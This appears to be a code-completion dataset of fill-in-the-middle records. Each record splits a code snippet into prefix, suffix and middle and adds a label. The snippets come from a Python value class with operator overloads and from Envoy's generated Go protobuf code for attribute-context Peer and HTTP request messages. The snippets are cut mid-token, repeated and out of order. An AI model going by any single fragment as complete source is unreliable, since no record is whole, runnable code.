def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply | """Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses.""" | identifier_body |
attribute_context.pb.go | type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func ( | random_line_split |
||
attribute_context.pb.go | (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_HttpRequest.Marshal(b, m, deterministic)
}
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AttributeContext_HttpRequest) GetScheme() string {
if m != nil {
return m.Scheme
}
return ""
}
func (m *AttributeContext_HttpRequest) GetQuery() string {
if m != nil | {
return m.Query
} | conditional_block |
|
attribute_context.pb.go | () *core.Metadata {
if m != nil {
return m.MetadataContext
}
return nil
}
// This message defines attributes for a node that handles a network request.
// The node can be either a service or an application that sends, forwards,
// or receives the request. Service peers should fill in the `service`,
// `principal`, and `labels` as appropriate.
// [#next-free-field: 6]
type AttributeContext_Peer struct {
// The address of the peer, this is typically the IP address.
// It can also be UDS path, or others.
Address *core.Address `protobuf:"bytes,1,opt,name=address,proto3" json:"address,omitempty"`
// The canonical service name of the peer.
// It should be set to :ref:`the HTTP x-envoy-downstream-service-cluster
// <config_http_conn_man_headers_downstream-service-cluster>`
// If a more trusted source of the service name is available through mTLS/secure naming, it
// should be used.
Service string `protobuf:"bytes,2,opt,name=service,proto3" json:"service,omitempty"`
// The labels associated with the peer.
// These could be pod labels for Kubernetes or tags for VMs.
// The source of the labels could be an X.509 certificate or other configuration.
Labels map[string]string `protobuf:"bytes,3,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The authenticated identity of this peer.
// For example, the identity associated with the workload such as a service account.
// If an X.509 certificate is used to assert the identity this field should be sourced from
// `URI Subject Alternative Names`, `DNS Subject Alternate Names` or `Subject` in that order.
// The primary identity should be the principal. The principal format is issuer specific.
//
// Example:
// * SPIFFE format is `spiffe://trust-domain/path`
// * Google account format is `https://accounts.google.com/{userid}`
Principal string `protobuf:"bytes,4,opt,name=principal,proto3" json:"principal,omitempty"`
// The X.509 certificate used to authenticate the identify of this peer.
// When present, the certificate contents are encoded in URL and PEM format.
Certificate string `protobuf:"bytes,5,opt,name=certificate,proto3" json:"certificate,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
| GetMetadataContext | identifier_name |
|
attribute_context.pb.go | (m *AttributeContext_Peer) Reset() { *m = AttributeContext_Peer{} }
func (m *AttributeContext_Peer) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Peer) ProtoMessage() {}
func (*AttributeContext_Peer) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 0}
}
func (m *AttributeContext_Peer) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Peer.Unmarshal(m, b)
}
func (m *AttributeContext_Peer) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Peer.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Peer) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Peer.Merge(m, src)
}
func (m *AttributeContext_Peer) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Peer.Size(m)
}
func (m *AttributeContext_Peer) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Peer.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Peer proto.InternalMessageInfo
func (m *AttributeContext_Peer) GetAddress() *core.Address {
if m != nil {
return m.Address
}
return nil
}
func (m *AttributeContext_Peer) GetService() string {
if m != nil {
return m.Service
}
return ""
}
func (m *AttributeContext_Peer) GetLabels() map[string]string {
if m != nil {
return m.Labels
}
return nil
}
func (m *AttributeContext_Peer) GetPrincipal() string {
if m != nil {
return m.Principal
}
return ""
}
func (m *AttributeContext_Peer) GetCertificate() string {
if m != nil {
return m.Certificate
}
return ""
}
// Represents a network request, such as an HTTP request.
type AttributeContext_Request struct {
// The timestamp when the proxy receives the first byte of the request.
Time *timestamp.Timestamp `protobuf:"bytes,1,opt,name=time,proto3" json:"time,omitempty"`
// Represents an HTTP request or an HTTP-like request.
Http *AttributeContext_HttpRequest `protobuf:"bytes,2,opt,name=http,proto3" json:"http,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_Request) Reset() { *m = AttributeContext_Request{} }
func (m *AttributeContext_Request) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_Request) ProtoMessage() {}
func (*AttributeContext_Request) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 1}
}
func (m *AttributeContext_Request) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_Request.Unmarshal(m, b)
}
func (m *AttributeContext_Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_AttributeContext_Request.Marshal(b, m, deterministic)
}
func (m *AttributeContext_Request) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_Request.Merge(m, src)
}
func (m *AttributeContext_Request) XXX_Size() int {
return xxx_messageInfo_AttributeContext_Request.Size(m)
}
func (m *AttributeContext_Request) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_Request.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_Request proto.InternalMessageInfo
func (m *AttributeContext_Request) GetTime() *timestamp.Timestamp {
if m != nil {
return m.Time
}
return nil
}
func (m *AttributeContext_Request) GetHttp() *AttributeContext_HttpRequest {
if m != nil {
return m.Http
}
return nil
}
// This message defines attributes for an HTTP request.
// HTTP/1.x, HTTP/2, gRPC are all considered as HTTP requests.
// [#next-free-field: 12]
type AttributeContext_HttpRequest struct {
// The unique ID for a request, which can be propagated to downstream
// systems. The ID should have low probability of collision
// within a single day for a specific service.
// For HTTP requests, it should be X-Request-ID or equivalent.
Id string `protobuf:"bytes,1,opt,name=id,proto3" json:"id,omitempty"`
// The HTTP request method, such as `GET`, `POST`.
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
// The HTTP request headers. If multiple headers share the same key, they
// must be merged according to the HTTP spec. All header keys must be
// lower-cased, because HTTP header keys are case-insensitive.
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
// The request target, as it appears in the first line of the HTTP request. This includes
// the URL path and query-string. No decoding is performed.
Path string `protobuf:"bytes,4,opt,name=path,proto3" json:"path,omitempty"`
// The HTTP request `Host` or 'Authority` header value.
Host string `protobuf:"bytes,5,opt,name=host,proto3" json:"host,omitempty"`
// The HTTP URL scheme, such as `http` and `https`.
Scheme string `protobuf:"bytes,6,opt,name=scheme,proto3" json:"scheme,omitempty"`
// This field is always empty, and exists for compatibility reasons. The HTTP URL query is
// included in `path` field.
Query string `protobuf:"bytes,7,opt,name=query,proto3" json:"query,omitempty"`
// This field is always empty, and exists for compatibility reasons. The URL fragment is
// not submitted as part of HTTP requests; it is unknowable.
Fragment string `protobuf:"bytes,8,opt,name=fragment,proto3" json:"fragment,omitempty"`
// The HTTP request size in bytes. If unknown, it must be -1.
Size int64 `protobuf:"varint,9,opt,name=size,proto3" json:"size,omitempty"`
// The network protocol used with the request, such as "HTTP/1.0", "HTTP/1.1", or "HTTP/2".
//
// See :repo:`headers.h:ProtocolStrings <source/common/http/headers.h>` for a list of all
// possible values.
Protocol string `protobuf:"bytes,10,opt,name=protocol,proto3" json:"protocol,omitempty"`
// The HTTP request body.
Body string `protobuf:"bytes,11,opt,name=body,proto3" json:"body,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *AttributeContext_HttpRequest) Reset() { *m = AttributeContext_HttpRequest{} }
func (m *AttributeContext_HttpRequest) String() string { return proto.CompactTextString(m) }
func (*AttributeContext_HttpRequest) ProtoMessage() {}
func (*AttributeContext_HttpRequest) Descriptor() ([]byte, []int) {
return fileDescriptor_a6030c9468e3591b, []int{0, 2}
}
func (m *AttributeContext_HttpRequest) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_AttributeContext_HttpRequest.Unmarshal(m, b)
}
func (m *AttributeContext_HttpRequest) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) |
func (m *AttributeContext_HttpRequest) XXX_Merge(src proto.Message) {
xxx_messageInfo_AttributeContext_HttpRequest.Merge(m, src)
}
func (m *AttributeContext_HttpRequest) XXX_Size() int {
return xxx_messageInfo_AttributeContext_HttpRequest.Size(m)
}
func (m *AttributeContext_HttpRequest) XXX_DiscardUnknown() {
xxx_messageInfo_AttributeContext_HttpRequest.DiscardUnknown(m)
}
var xxx_messageInfo_AttributeContext_HttpRequest proto.InternalMessageInfo
func (m *AttributeContext_HttpRequest) GetId() string {
if m != nil {
return m.Id
}
return ""
}
func (m *AttributeContext_HttpRequest) GetMethod() string {
if m != nil {
return m.Method
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHeaders() map[string]string {
if m != nil {
return m.Headers
}
return nil
}
func (m *AttributeContext_HttpRequest) GetPath() string {
if m != nil {
return m.Path
}
return ""
}
func (m *AttributeContext_HttpRequest) GetHost() string {
if m != nil {
return m.Host
}
return ""
